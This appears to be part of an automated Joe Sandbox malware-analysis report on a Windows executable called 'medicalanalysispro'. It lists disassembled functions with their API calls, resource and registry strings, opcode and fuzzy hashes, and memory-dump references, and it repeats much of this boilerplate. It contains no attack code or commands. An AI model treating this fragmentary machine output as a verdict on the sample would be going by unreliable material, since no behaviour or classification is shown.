                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                                                                                                • String ID: "$:$@$RegServer
                                                                                                                                                                                                                                                                                                                • API String ID: 1203814774-4077547207
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                                                                                                                                                                                                                                • Instruction ID: c26c9b98634b6cb30d261194bed0a7901294d763a2aa955ca8897d7610dee104
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE02E322E0C682C1FA65AB289C146B9EBA1AF45740FD88535D95E06F9FCE3DF521C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A3910 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
                                                                                                                                                                                                                                                                                                                • String ID: $ham
                                                                                                                                                                                                                                                                                                                • API String ID: 2654313074-563232235
                                                                                                                                                                                                                                                                                                                • Opcode ID: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
                                                                                                                                                                                                                                                                                                                • Instruction ID: f471ffb87abe12179d77602bf426da30df40bba54e8b89c26ee5e1225522a500
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE517231A08A42C6E710AB11E844679FAA1FB8DB55F859231DA1E07F9ECF3CB465C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A4A60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4A86
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4AAA
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4ACA
                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4AEC
                                                                                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4B1B
                                                                                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4B3A
                                                                                                                                                                                                                                                                                                                • CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4B54
                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32 ref: 00007FF7600A4BF1
                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7600A35E3), ref: 00007FF7600A4C0D
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                                                                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                                                                                                • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                                                                                                                                                                                                                                • Instruction ID: fa30dd9a1f49d92df466ef93e697eb6fd2744e2191ddce6444c54c45866dd3e4
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87516E25A09B82D6E641AB11A8105BAFBA0FB89B90FC54534DE4E07F9ADF3CF454C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A4DCC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159memorywindowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                                                                                • String ID: ham$rce.
                                                                                                                                                                                                                                                                                                                • API String ID: 2929476258-2218604853
                                                                                                                                                                                                                                                                                                                • Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                                                                                                                                                                                                                                • Instruction ID: da1c990a1c05ae876b899f74a8572a2c9be6e2fa01386a65c3ad2b7162bef76f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF61C425E087C1D6FB11AB25A8007B9EA90FB99794F845230DE4D07B9ADF3CF5568730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A261C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129registryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                                                                                                • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 61a87e31acd400d40ef357cff5fb8e23ded08d2ebc1280b22789dab271abe08a
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3351A472718681C6EB10AB15E8402BEFBA0FB89B90F945031DA4E07F5ACF3DE955C720
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A33F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                                                                                                • String ID: ham
                                                                                                                                                                                                                                                                                                                • API String ID: 3785188418-4133487753
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
                                                                                                                                                                                                                                                                                                                • Instruction ID: a76acdea6419a334f43616a81a7e7adae7dd36b62710b23487c3116bcd425be4
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01316635E08A42CAE6156B64E8042B5FB91FB8EB51FD49330D91E06B9ADF3DB065C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A12EC Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2168512254-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8abc4b5e7514813695d43bfd58c4de3bfbf96ae5c1d2aaa09d88cbc017a4327c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6516132704A42CBE710AF25E4406F9BBA4FB4DB88F825135DA0E53B59DF39E464CB60
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A7F04 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                                                                                                • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                                                                                                • Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                                                                                                                                                                                                                                • Instruction ID: 12227f38b9e39e4bdb424c53dede36a4cefd7daea9cbd1c0620263855bad52fc
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03519432A08A82CAE7509B24D4406BDF7A1FB88B50F854531DA6D03B9ADF7DF558CB30
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A2834 Relevance: 12.2, APIs: 8, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1051330783-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4c0f82a7db4bee0280cda1b8575c7e0ab65716179fefdfcc6eca1e120c27b863
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7516432B04642CBEB109F1A94006B9B7A4FB49B94F945131DE0D67B99DF39F8A1C730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A2A6C Relevance: 12.1, APIs: 8, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 975904313-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                                                                                                                                                                                                                                • Instruction ID: bb12e2d6146e14835d796d372adecd1f5739927c2b535e1b331c2679df5062c1
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2979d283a01604d961735a48130beb2dfdd98dda21d4e4b67344f999235a94dc
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94518861A1C6C5C6FB216F2594143B9FB91EB49B90F888171CA4E07B8ACF3CF4558730
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A4C68 Relevance: 10.6, APIs: 7, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2212493051-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
                                                                                                                                                                                                                                                                                                                • Instruction ID: e79e99fab1aabd9e14c24c86544f5564bfaa6d0d5d013e04d75674b0833d4e9b
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f008325a7646b8fc205624c4fd77acf99a3c7384c25ca23c8312c3aeeac09b65
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53317E36B14641CAE7109B65E8049ADBBA0F78DB99F999130CE0A57B49CF3DE4458B20
                                                                                                                                                                                                                                                                                                                Function 00007FF7600A3F74 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 71memorystringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5078
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: SizeofResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A5089
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FindResourceA.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50AF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LoadResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50C0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: LockResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50CF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: memcpy_s.MSVCRT ref: 00007FF7600A50EE
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A5050: FreeResource.KERNEL32(?,?,00000000,00007FF7600A2E43), ref: 00007FF7600A50FD
                                                                                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,?,00007FF7600A3139), ref: 00007FF7600A3F95
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF7600A4018
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: LoadStringA.USER32 ref: 00007FF7600A4E60
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A4DCC: MessageBoxA.USER32 ref: 00007FF7600A4EA0
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7700: GetLastError.KERNEL32 ref: 00007FF7600A7704
                                                                                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,?,?,?,?,00007FF7600A3139), ref: 00007FF7600A403E
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,00007FF7600A3139), ref: 00007FF7600A409F
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7AC8: FindResourceA.KERNEL32 ref: 00007FF7600A7AF2
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7AC8: LoadResource.KERNEL32 ref: 00007FF7600A7B09
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7AC8: DialogBoxIndirectParamA.USER32 ref: 00007FF7600A7B3F
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7600A7AC8: FreeResource.KERNEL32 ref: 00007FF7600A7B51
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF7600A4078
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                                                                                • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                                                                                • Opcode ID: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4ee99429c8f130cf8ce3470f38ea2fe5baa4932d589543d97e616b79fd4f27b0
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd043fb7765e0d1fe4f6bc553d18fbf9cb3d91e7291ed8dbbb6954e2a9a98f39
